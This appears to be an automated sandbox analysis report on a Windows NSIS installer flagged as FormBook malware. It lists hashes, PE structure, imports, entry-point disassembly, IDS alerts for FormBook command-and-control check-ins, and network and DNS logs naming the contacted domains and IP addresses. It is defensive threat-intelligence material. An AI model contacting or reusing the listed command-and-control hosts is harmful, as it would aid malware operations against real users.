                                                                                                                                                                Preview:G...X=.......hF.XG.}.OR..|..7.(....W.b.9...w.Y`.V...T..p.p.M..=...}....Z[.9..*y.%v^I......$......\.@.jvU........Ym!...L...@.]......(r..C`..8..$.I.x.h...J.v....{U).?...7.=A@...\^1`...H`..n.r.....ei...Mx?..E.{W.....$.G.,{B.\.r+.)[.....Z."ZR.{.h...=..+.;..-./...:}%......M....<.W.b....w.Y`.VO..T..p.p.M.K..{....[d.O..>.t..yO.~.E0L..2gT...ay.2n.Ob.`.w.....Ym!....A....G............N-..~...Yv.h.........4.0.?...7.=...<.\^1..m.h.g........ei.....g.|..........$.G.<.B.*.r+C.[..L...."Z..{hh...=.....-./.S.:?%.....IM.(....W.b.9...w.Y`.V...T..p.p.M.K..{....[d.O..>.t..yO.~.E0L..2gT...ay.2n.Ob.`.w.....Ym!....A....G............N-..~...Yv.h.........4.0.?...7.=A@...\^1:g..m.h.gz.......ei.....g.|.E..W.....$.G.<.B.*.r+C.[..L...."Z..{hh...=.....-./.S.:?%.....IM.(....W.b.9...w.Y`.V...T..p.p.M.K..{....[d.O..>.t..yO.~.E0L..2gT...ay.2n.Ob.`.w.....Ym!....A....G............N-..~...Yv.h.........4.0.?...7.=A@...\^1:g..m.h.gz.......ei.....g.|.E..W.....$.G
                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                Entropy (8bit):7.871248613955604
                                                                                                                                                                TrID:
                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                File name:SecuriteInfo.com.FileRepMalware.16340.31219.exe
                                                                                                                                                                File size:420'368 bytes
                                                                                                                                                                MD5:0c57a7aae080fd2eac42a31fa5b7f051
                                                                                                                                                                SHA1:2e181788e6dec9e170556e2daa39a61dc2bf8b89
                                                                                                                                                                SHA256:87770248637ba53e2fd2c65ec24b95659d9b1f2d3af87234601fd720f81d6fd8
                                                                                                                                                                SHA512:c6dfd4c62ce0411aeb882020999f6ef967ea9cb1ed1832a568417a05f7e87a7c3e255ec911af0acb9704b597d1a41d4125e8893c08f8d6e31441ff017f3cb784
                                                                                                                                                                SSDEEP:12288:urCOfcbuDZzf0/vJomoJNmBPQBZo+j34j:UCociJwB7AKj
                                                                                                                                                                TLSH:4394231F5AC0C877C19207F50DB6EA76A7798D05A5D06A87CBEC3F73B821786C2062E5
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@
                                                                                                                                                                Icon Hash:0e3b1b1b194c3331
                                                                                                                                                                Entrypoint:0x40312a
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:4
                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                File Version Major:4
                                                                                                                                                                File Version Minor:0
                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                Import Hash:b76363e9cb88bf9390860da8e50999d2
                                                                                                                                                                Instruction
                                                                                                                                                                sub esp, 00000184h
                                                                                                                                                                push ebx
                                                                                                                                                                push ebp
                                                                                                                                                                push esi
                                                                                                                                                                push edi
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push 00008001h
                                                                                                                                                                mov dword ptr [esp+20h], ebx
                                                                                                                                                                mov dword ptr [esp+14h], 00409168h
                                                                                                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                mov byte ptr [esp+18h], 00000020h
                                                                                                                                                                call dword ptr [004070B0h]
                                                                                                                                                                call dword ptr [004070ACh]
                                                                                                                                                                cmp ax, 00000006h
                                                                                                                                                                je 00007FB378C01B03h
                                                                                                                                                                push ebx
                                                                                                                                                                call 00007FB378C048E4h
                                                                                                                                                                cmp eax, ebx
                                                                                                                                                                je 00007FB378C01AF9h
                                                                                                                                                                push 00000C00h
                                                                                                                                                                call eax
                                                                                                                                                                mov esi, 00407280h
                                                                                                                                                                push esi
                                                                                                                                                                call 00007FB378C04860h
                                                                                                                                                                push esi
                                                                                                                                                                call dword ptr [00407108h]
                                                                                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                cmp byte ptr [esi], bl
                                                                                                                                                                jne 00007FB378C01ADDh
                                                                                                                                                                push 0000000Dh
                                                                                                                                                                call 00007FB378C048B8h
                                                                                                                                                                push 0000000Bh
                                                                                                                                                                call 00007FB378C048B1h
                                                                                                                                                                mov dword ptr [0042EC24h], eax
                                                                                                                                                                call dword ptr [00407038h]
                                                                                                                                                                push ebx
                                                                                                                                                                call dword ptr [0040726Ch]
                                                                                                                                                                mov dword ptr [0042ECD8h], eax
                                                                                                                                                                push ebx
                                                                                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                                                                                push 00000160h
                                                                                                                                                                push eax
                                                                                                                                                                push ebx
                                                                                                                                                                push 00429058h
                                                                                                                                                                call dword ptr [0040715Ch]
                                                                                                                                                                push 0040915Ch
                                                                                                                                                                push 0042E420h
                                                                                                                                                                call 00007FB378C044E4h
                                                                                                                                                                call dword ptr [0040710Ch]
                                                                                                                                                                mov ebp, 00434000h
                                                                                                                                                                push eax
                                                                                                                                                                push ebp
                                                                                                                                                                call 00007FB378C044D2h
                                                                                                                                                                push ebx
                                                                                                                                                                call dword ptr [00407144h]
                                                                                                                                                                Programming Language:
                                                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x75240xa0.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000xced8.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x10000x5e660x6000False0.6705729166666666data6.440655734359132IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rdata0x70000x12a20x1400False0.4455078125data5.058328787102383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .data0x90000x25d180x600False0.458984375data4.18773476617059IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .rsrc0x370000xced80xd000False0.7914287860576923data6.895564080355567IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                RT_ICON0x372b00x6effPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9880344888263242
                                                                                                                                                                RT_ICON0x3e1b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.5105809128630705
                                                                                                                                                                RT_ICON0x407580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.5792682926829268
                                                                                                                                                                RT_ICON0x418000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.5951492537313433
                                                                                                                                                                RT_ICON0x426a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.7179602888086642
                                                                                                                                                                RT_ICON0x42f500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.7174855491329479
                                                                                                                                                                RT_ICON0x434b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.75177304964539
                                                                                                                                                                RT_DIALOG0x439200x100dataEnglishUnited States0.5234375
                                                                                                                                                                RT_DIALOG0x43a200x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                RT_DIALOG0x43b400x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                RT_GROUP_ICON0x43ba00x68dataEnglishUnited States0.6826923076923077
                                                                                                                                                                RT_MANIFEST0x43c080x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States0.5656424581005587
                                                                                                                                                                DLLImport
                                                                                                                                                                KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                                                                                                                                USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                                                                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                                                                                                                                ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishUnited States
                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                192.168.2.73.33.130.19049727802031412 11/03/23-12:38:11.760375TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.73.33.130.190
                                                                                                                                                                192.168.2.7108.186.24.17549717802031412 11/03/23-12:36:49.663320TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.7108.186.24.175
                                                                                                                                                                192.168.2.734.149.87.4549729802031412 11/03/23-12:38:32.172304TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.734.149.87.45
                                                                                                                                                                192.168.2.7104.17.158.149716802031412 11/03/23-12:36:28.890688TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971680192.168.2.7104.17.158.1
                                                                                                                                                                192.168.2.7103.224.212.21649719802031412 11/03/23-12:37:30.104632TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.7103.224.212.216
                                                                                                                                                                192.168.2.775.2.115.19649718802031412 11/03/23-12:37:09.512099TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.775.2.115.196
                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Nov 3, 2023 12:35:07.389504910 CET4971080192.168.2.7198.177.124.40
                                                                                                                                                                Nov 3, 2023 12:35:08.395555973 CET4971080192.168.2.7198.177.124.40
                                                                                                                                                                Nov 3, 2023 12:35:10.395509005 CET4971080192.168.2.7198.177.124.40
                                                                                                                                                                Nov 3, 2023 12:35:14.395534039 CET4971080192.168.2.7198.177.124.40
                                                                                                                                                                Nov 3, 2023 12:35:22.395524025 CET4971080192.168.2.7198.177.124.40
                                                                                                                                                                Nov 3, 2023 12:35:29.752605915 CET4971280192.168.2.7198.177.124.40
                                                                                                                                                                Nov 3, 2023 12:35:30.739383936 CET4971280192.168.2.7198.177.124.40
                                                                                                                                                                Nov 3, 2023 12:35:30.822355032 CET4971580192.168.2.7154.17.26.8
                                                                                                                                                                Nov 3, 2023 12:35:30.980528116 CET8049715154.17.26.8192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:35:31.489296913 CET4971580192.168.2.7154.17.26.8
                                                                                                                                                                Nov 3, 2023 12:35:31.646733999 CET8049715154.17.26.8192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:35:32.161175966 CET4971580192.168.2.7154.17.26.8
                                                                                                                                                                Nov 3, 2023 12:35:32.318820953 CET8049715154.17.26.8192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:35:32.739305973 CET4971280192.168.2.7198.177.124.40
                                                                                                                                                                Nov 3, 2023 12:35:32.833058119 CET4971580192.168.2.7154.17.26.8
                                                                                                                                                                Nov 3, 2023 12:35:32.990966082 CET8049715154.17.26.8192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:35:33.505008936 CET4971580192.168.2.7154.17.26.8
                                                                                                                                                                Nov 3, 2023 12:35:33.662457943 CET8049715154.17.26.8192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:35:36.740926981 CET4971280192.168.2.7198.177.124.40
                                                                                                                                                                Nov 3, 2023 12:35:44.739339113 CET4971280192.168.2.7198.177.124.40
                                                                                                                                                                Nov 3, 2023 12:36:28.798491001 CET4971680192.168.2.7104.17.158.1
                                                                                                                                                                Nov 3, 2023 12:36:28.890494108 CET8049716104.17.158.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:36:28.890592098 CET4971680192.168.2.7104.17.158.1
                                                                                                                                                                Nov 3, 2023 12:36:28.890687943 CET4971680192.168.2.7104.17.158.1
                                                                                                                                                                Nov 3, 2023 12:36:28.982506037 CET8049716104.17.158.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:36:28.985057116 CET8049716104.17.158.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:36:28.985295057 CET4971680192.168.2.7104.17.158.1
                                                                                                                                                                Nov 3, 2023 12:36:28.985434055 CET8049716104.17.158.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:36:28.985497952 CET4971680192.168.2.7104.17.158.1
                                                                                                                                                                Nov 3, 2023 12:36:29.077470064 CET8049716104.17.158.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:36:49.491466045 CET4971780192.168.2.7108.186.24.175
                                                                                                                                                                Nov 3, 2023 12:36:49.662949085 CET8049717108.186.24.175192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:36:49.663186073 CET4971780192.168.2.7108.186.24.175
                                                                                                                                                                Nov 3, 2023 12:36:49.663320065 CET4971780192.168.2.7108.186.24.175
                                                                                                                                                                Nov 3, 2023 12:36:49.836610079 CET8049717108.186.24.175192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:36:49.836668968 CET8049717108.186.24.175192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:36:49.837048054 CET4971780192.168.2.7108.186.24.175
                                                                                                                                                                Nov 3, 2023 12:36:49.837048054 CET4971780192.168.2.7108.186.24.175
                                                                                                                                                                Nov 3, 2023 12:36:50.008388996 CET8049717108.186.24.175192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:09.419681072 CET4971880192.168.2.775.2.115.196
                                                                                                                                                                Nov 3, 2023 12:37:09.511653900 CET804971875.2.115.196192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:09.511838913 CET4971880192.168.2.775.2.115.196
                                                                                                                                                                Nov 3, 2023 12:37:09.512099028 CET4971880192.168.2.775.2.115.196
                                                                                                                                                                Nov 3, 2023 12:37:09.604214907 CET804971875.2.115.196192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:09.932372093 CET804971875.2.115.196192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:09.932394981 CET804971875.2.115.196192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:09.932506084 CET4971880192.168.2.775.2.115.196
                                                                                                                                                                Nov 3, 2023 12:37:09.932625055 CET4971880192.168.2.775.2.115.196
                                                                                                                                                                Nov 3, 2023 12:37:09.945883989 CET804971875.2.115.196192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:09.945952892 CET4971880192.168.2.775.2.115.196
                                                                                                                                                                Nov 3, 2023 12:37:10.025494099 CET804971875.2.115.196192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:29.948903084 CET4971980192.168.2.7103.224.212.216
                                                                                                                                                                Nov 3, 2023 12:37:30.104263067 CET8049719103.224.212.216192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:30.104367018 CET4971980192.168.2.7103.224.212.216
                                                                                                                                                                Nov 3, 2023 12:37:30.104631901 CET4971980192.168.2.7103.224.212.216
                                                                                                                                                                Nov 3, 2023 12:37:30.272778988 CET8049719103.224.212.216192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:30.272846937 CET8049719103.224.212.216192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:30.272969007 CET4971980192.168.2.7103.224.212.216
                                                                                                                                                                Nov 3, 2023 12:37:30.276887894 CET4971980192.168.2.7103.224.212.216
                                                                                                                                                                Nov 3, 2023 12:37:30.432271004 CET8049719103.224.212.216192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:11.668055058 CET4972780192.168.2.73.33.130.190
                                                                                                                                                                Nov 3, 2023 12:38:11.760113955 CET80497273.33.130.190192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:11.760304928 CET4972780192.168.2.73.33.130.190
                                                                                                                                                                Nov 3, 2023 12:38:11.760375023 CET4972780192.168.2.73.33.130.190
                                                                                                                                                                Nov 3, 2023 12:38:11.852693081 CET80497273.33.130.190192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:11.865736961 CET80497273.33.130.190192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:11.865767002 CET80497273.33.130.190192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:11.865871906 CET4972780192.168.2.73.33.130.190
                                                                                                                                                                Nov 3, 2023 12:38:11.865930080 CET4972780192.168.2.73.33.130.190
                                                                                                                                                                Nov 3, 2023 12:38:11.880346060 CET80497273.33.130.190192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:11.880444050 CET4972780192.168.2.73.33.130.190
                                                                                                                                                                Nov 3, 2023 12:38:11.958362103 CET80497273.33.130.190192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:32.073185921 CET4972980192.168.2.734.149.87.45
                                                                                                                                                                Nov 3, 2023 12:38:32.172116995 CET804972934.149.87.45192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:32.172210932 CET4972980192.168.2.734.149.87.45
                                                                                                                                                                Nov 3, 2023 12:38:32.172303915 CET4972980192.168.2.734.149.87.45
                                                                                                                                                                Nov 3, 2023 12:38:32.269622087 CET804972934.149.87.45192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:32.290714979 CET804972934.149.87.45192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:32.290729046 CET804972934.149.87.45192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:32.290834904 CET4972980192.168.2.734.149.87.45
                                                                                                                                                                Nov 3, 2023 12:38:32.290904999 CET4972980192.168.2.734.149.87.45
                                                                                                                                                                Nov 3, 2023 12:38:32.388066053 CET804972934.149.87.45192.168.2.7
                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Nov 3, 2023 12:35:07.288681030 CET5700853192.168.2.71.1.1.1
                                                                                                                                                                Nov 3, 2023 12:35:07.387788057 CET53570081.1.1.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:35:29.644649982 CET5969653192.168.2.71.1.1.1
                                                                                                                                                                Nov 3, 2023 12:35:29.742508888 CET53596961.1.1.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:35:30.431287050 CET5774453192.168.2.71.1.1.1
                                                                                                                                                                Nov 3, 2023 12:35:30.821049929 CET53577441.1.1.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:35:48.178874016 CET5179253192.168.2.71.1.1.1
                                                                                                                                                                Nov 3, 2023 12:35:48.532627106 CET53517921.1.1.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:36:08.162393093 CET5593053192.168.2.71.1.1.1
                                                                                                                                                                Nov 3, 2023 12:36:08.266604900 CET53559301.1.1.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:36:28.272099972 CET4970553192.168.2.71.1.1.1
                                                                                                                                                                Nov 3, 2023 12:36:28.797101974 CET53497051.1.1.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:36:48.850645065 CET4922553192.168.2.71.1.1.1
                                                                                                                                                                Nov 3, 2023 12:36:49.489738941 CET53492251.1.1.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:09.240822077 CET5286653192.168.2.71.1.1.1
                                                                                                                                                                Nov 3, 2023 12:37:09.418509960 CET53528661.1.1.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:29.646694899 CET5563053192.168.2.71.1.1.1
                                                                                                                                                                Nov 3, 2023 12:37:29.944287062 CET53556301.1.1.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:37:50.961755991 CET6182453192.168.2.71.1.1.1
                                                                                                                                                                Nov 3, 2023 12:37:51.314821005 CET53618241.1.1.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:11.506860971 CET5132553192.168.2.71.1.1.1
                                                                                                                                                                Nov 3, 2023 12:38:11.666805029 CET53513251.1.1.1192.168.2.7
                                                                                                                                                                Nov 3, 2023 12:38:31.953860998 CET5186353192.168.2.71.1.1.1
                                                                                                                                                                Nov 3, 2023 12:38:32.072005987 CET53518631.1.1.1192.168.2.7
                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Nov 3, 2023 12:35:07.288681030 CET192.168.2.71.1.1.10x455aStandard query (0)www.klxcv.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:35:29.644649982 CET192.168.2.71.1.1.10x1ef5Standard query (0)www.klxcv.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:35:30.431287050 CET192.168.2.71.1.1.10xed4fStandard query (0)www.xuangesmd.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:35:48.178874016 CET192.168.2.71.1.1.10x4092Standard query (0)www.e9pf4s.topA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:36:08.162393093 CET192.168.2.71.1.1.10xb56bStandard query (0)www.townstart.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:36:28.272099972 CET192.168.2.71.1.1.10x6752Standard query (0)www.gaming-chairs-vn-vi-2885437.fyiA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:36:48.850645065 CET192.168.2.71.1.1.10x859eStandard query (0)www.sklm888.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:37:09.240822077 CET192.168.2.71.1.1.10x8164Standard query (0)www.wokeeducationhateskids.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:37:29.646694899 CET192.168.2.71.1.1.10xaf84Standard query (0)www.umertazkeer.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:37:50.961755991 CET192.168.2.71.1.1.10xcf02Standard query (0)www.mzfgwh.topA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:38:11.506860971 CET192.168.2.71.1.1.10x3f22Standard query (0)www.glocraze.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:38:31.953860998 CET192.168.2.71.1.1.10xadebStandard query (0)www.durufilmyapim.comA (IP address)IN (0x0001)false
                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Nov 3, 2023 12:35:07.387788057 CET1.1.1.1192.168.2.70x455aNo error (0)www.klxcv.xyz198.177.124.40A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:35:29.742508888 CET1.1.1.1192.168.2.70x1ef5No error (0)www.klxcv.xyz198.177.124.40A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:35:30.821049929 CET1.1.1.1192.168.2.70xed4fNo error (0)www.xuangesmd.com154.17.26.8A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:35:48.532627106 CET1.1.1.1192.168.2.70x4092Name error (3)www.e9pf4s.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:36:08.266604900 CET1.1.1.1192.168.2.70xb56bName error (3)www.townstart.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:36:28.797101974 CET1.1.1.1192.168.2.70x6752No error (0)www.gaming-chairs-vn-vi-2885437.fyissl1.prod.systemdragon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:36:28.797101974 CET1.1.1.1192.168.2.70x6752No error (0)ssl1.prod.systemdragon.com104.17.158.1A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:36:28.797101974 CET1.1.1.1192.168.2.70x6752No error (0)ssl1.prod.systemdragon.com104.17.157.1A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:36:49.489738941 CET1.1.1.1192.168.2.70x859eNo error (0)www.sklm888.com108.186.24.175A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:37:09.418509960 CET1.1.1.1192.168.2.70x8164No error (0)www.wokeeducationhateskids.com75.2.115.196A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:37:29.944287062 CET1.1.1.1192.168.2.70xaf84No error (0)www.umertazkeer.com103.224.212.216A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:37:51.314821005 CET1.1.1.1192.168.2.70xcf02Name error (3)www.mzfgwh.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:38:11.666805029 CET1.1.1.1192.168.2.70x3f22No error (0)www.glocraze.comglocraze.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:38:11.666805029 CET1.1.1.1192.168.2.70x3f22No error (0)glocraze.com3.33.130.190A (IP address)IN (0x0001)false
